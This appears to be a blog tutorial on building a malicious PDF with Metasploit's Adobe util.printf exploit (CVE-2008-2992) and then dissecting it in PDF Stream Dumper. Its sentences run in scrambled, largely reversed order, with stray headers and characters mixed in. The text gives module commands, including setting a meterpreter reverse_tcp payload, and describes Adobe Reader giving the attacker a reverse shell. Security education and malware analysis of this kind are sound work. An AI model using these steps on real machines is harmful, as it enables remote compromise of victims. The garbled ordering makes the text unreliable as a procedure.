Which says to execute Javascript located in stream 6. Let’s move to stream 5: /Type/Action/S/JavaScript/JS 6 0 R That we can translate to OpenAction on stream 5. If you open Stream 1, you can see: /Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered. But let’s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray created by a Javascript code. Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture). We can start by checking if some exploit is detected by the tool using the “Exploit Scan” menu: Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6
#PAYLOAD EXTRACTOR PDF#
Load the malicious PDF with it, and take some time to familiarize yourself with the tool. First, we will need a tool called PDF Stream Dumper, so download it. Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload (we’re still with the calc.exe PDF). Adobe Reader now has a backdoor (reverse shell) listening for commands. I’ve done another PDF but changed the payload slightly, just for fun: set PAYLOAD windows/meterpreter/reverse_tcp You should see a calculator being spawned from the Adobe Reader process. Once installed, execute the malicious.pdf file.
#PAYLOAD EXTRACTOR INSTALL#
On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). You will need to feed your target machine with it.
Open a metasploit console (installation of metasploit is not covered in this article) and type: use exploit/windows/fileformat/adobe_utilprintfĬopy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) on a shared drive. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to ) to install on the target machine. We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). For more information, please read Adobe’s specifications. Below is the overview of a classic PDF document. These objects are stored within the document as streams and most of the time encoded or compressed. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, …). PDF is object oriented format, defined by Adobe. PDF Stream Dumper: Infected PDF Analysis.
0 kommentar(er)
